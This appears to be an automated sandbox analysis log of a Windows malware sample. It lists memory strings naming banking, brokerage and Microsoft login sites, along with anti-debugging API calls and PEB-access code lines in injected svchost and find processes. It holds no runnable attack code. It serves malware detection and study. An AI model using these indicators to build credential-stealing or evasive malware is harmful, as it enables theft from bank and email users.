Source: find.exe, 00000004.00000002.2592239930.0000000003160000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 122-fVJ8.4.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: 122-fVJ8.4.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 122-fVJ8.4.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: 122-fVJ8.4.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: 122-fVJ8.4.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: 122-fVJ8.4.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 122-fVJ8.4.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 122-fVJ8.4.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 122-fVJ8.4.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 122-fVJ8.4.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 122-fVJ8.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: 122-fVJ8.4.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: 122-fVJ8.4.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 122-fVJ8.4.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 122-fVJ8.4.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 122-fVJ8.4.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 122-fVJ8.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: 122-fVJ8.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 122-fVJ8.4.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	API call chain: ExitProcess graph end node			graph_0-94387
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	API call chain: ExitProcess graph end node			graph_0-93160

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0327096E rdtsc

2_2_0327096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00417AA3 LdrLoadDll,

2_2_00417AA3

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe

Code function: 0_2_00276AAF BlockInput,

0_2_00276AAF

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe

Code function: 0_2_00223D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00223D19

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe

Code function: 0_2_00253920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,

0_2_00253920

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe

Code function: 0_2_0023E01E LoadLibraryA,GetProcAddress,

0_2_0023E01E

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_018780B0 mov eax, dword ptr fs:[00000030h]	0_2_018780B0
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_01878050 mov eax, dword ptr fs:[00000030h]	0_2_01878050
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_01876A10 mov eax, dword ptr fs:[00000030h]	0_2_01876A10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03308324 mov eax, dword ptr fs:[00000030h]	2_2_03308324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03308324 mov ecx, dword ptr fs:[00000030h]	2_2_03308324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03308324 mov eax, dword ptr fs:[00000030h]	2_2_03308324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03308324 mov eax, dword ptr fs:[00000030h]	2_2_03308324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]	2_2_0326A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]	2_2_0326A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]	2_2_0326A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322C310 mov ecx, dword ptr fs:[00000030h]	2_2_0322C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03250310 mov ecx, dword ptr fs:[00000030h]	2_2_03250310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D437C mov eax, dword ptr fs:[00000030h]	2_2_032D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]	2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]	2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]	2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B035C mov ecx, dword ptr fs:[00000030h]	2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]	2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]	2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FA352 mov eax, dword ptr fs:[00000030h]	2_2_032FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D8350 mov ecx, dword ptr fs:[00000030h]	2_2_032D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0330634F mov eax, dword ptr fs:[00000030h]	2_2_0330634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]	2_2_0322E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]	2_2_0322E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]	2_2_0322E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325438F mov eax, dword ptr fs:[00000030h]	2_2_0325438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325438F mov eax, dword ptr fs:[00000030h]	2_2_0325438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]	2_2_03228397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]	2_2_03228397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]	2_2_03228397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032663FF mov eax, dword ptr fs:[00000030h]	2_2_032663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EC3CD mov eax, dword ptr fs:[00000030h]	2_2_032EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]	2_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]	2_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]	2_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]	2_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B63C0 mov eax, dword ptr fs:[00000030h]	2_2_032B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h]	2_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h]	2_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h]	2_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D43D4 mov eax, dword ptr fs:[00000030h]	2_2_032D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D43D4 mov eax, dword ptr fs:[00000030h]	2_2_032D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322823B mov eax, dword ptr fs:[00000030h]	2_2_0322823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]	2_2_03234260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]	2_2_03234260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]	2_2_03234260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322826B mov eax, dword ptr fs:[00000030h]	2_2_0322826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B8243 mov eax, dword ptr fs:[00000030h]	2_2_032B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B8243 mov ecx, dword ptr fs:[00000030h]	2_2_032B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0330625D mov eax, dword ptr fs:[00000030h]	2_2_0330625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A250 mov eax, dword ptr fs:[00000030h]	2_2_0322A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236259 mov eax, dword ptr fs:[00000030h]	2_2_03236259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EA250 mov eax, dword ptr fs:[00000030h]	2_2_032EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EA250 mov eax, dword ptr fs:[00000030h]	2_2_032EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]	2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]	2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]	2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]	2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]	2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E284 mov eax, dword ptr fs:[00000030h]	2_2_0326E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E284 mov eax, dword ptr fs:[00000030h]	2_2_0326E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]	2_2_032B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]	2_2_032B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]	2_2_032B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]	2_2_032402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]	2_2_032402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]	2_2_032402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033062D6 mov eax, dword ptr fs:[00000030h]	2_2_033062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03260124 mov eax, dword ptr fs:[00000030h]	2_2_03260124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DA118 mov ecx, dword ptr fs:[00000030h]	2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]	2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]	2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]	2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F0115 mov eax, dword ptr fs:[00000030h]	2_2_032F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304164 mov eax, dword ptr fs:[00000030h]	2_2_03304164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304164 mov eax, dword ptr fs:[00000030h]	2_2_03304164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]	2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]	2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C4144 mov ecx, dword ptr fs:[00000030h]	2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]	2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]	2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322C156 mov eax, dword ptr fs:[00000030h]	2_2_0322C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C8158 mov eax, dword ptr fs:[00000030h]	2_2_032C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236154 mov eax, dword ptr fs:[00000030h]	2_2_03236154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236154 mov eax, dword ptr fs:[00000030h]	2_2_03236154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03270185 mov eax, dword ptr fs:[00000030h]	2_2_03270185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EC188 mov eax, dword ptr fs:[00000030h]	2_2_032EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EC188 mov eax, dword ptr fs:[00000030h]	2_2_032EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D4180 mov eax, dword ptr fs:[00000030h]	2_2_032D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D4180 mov eax, dword ptr fs:[00000030h]	2_2_032D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]	2_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]	2_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]	2_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]	2_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]	2_2_0322A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]	2_2_0322A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]	2_2_0322A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033061E5 mov eax, dword ptr fs:[00000030h]	2_2_033061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032601F8 mov eax, dword ptr fs:[00000030h]	2_2_032601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F61C3 mov eax, dword ptr fs:[00000030h]	2_2_032F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F61C3 mov eax, dword ptr fs:[00000030h]	2_2_032F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A020 mov eax, dword ptr fs:[00000030h]	2_2_0322A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322C020 mov eax, dword ptr fs:[00000030h]	2_2_0322C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C6030 mov eax, dword ptr fs:[00000030h]	2_2_032C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B4000 mov ecx, dword ptr fs:[00000030h]	2_2_032B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]	2_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]	2_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]	2_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]	2_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325C073 mov eax, dword ptr fs:[00000030h]	2_2_0325C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03232050 mov eax, dword ptr fs:[00000030h]	2_2_03232050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6050 mov eax, dword ptr fs:[00000030h]	2_2_032B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032280A0 mov eax, dword ptr fs:[00000030h]	2_2_032280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C80A8 mov eax, dword ptr fs:[00000030h]	2_2_032C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F60B8 mov eax, dword ptr fs:[00000030h]	2_2_032F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_032F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323208A mov eax, dword ptr fs:[00000030h]	2_2_0323208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0322A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032380E9 mov eax, dword ptr fs:[00000030h]	2_2_032380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B60E0 mov eax, dword ptr fs:[00000030h]	2_2_032B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0322C0F0
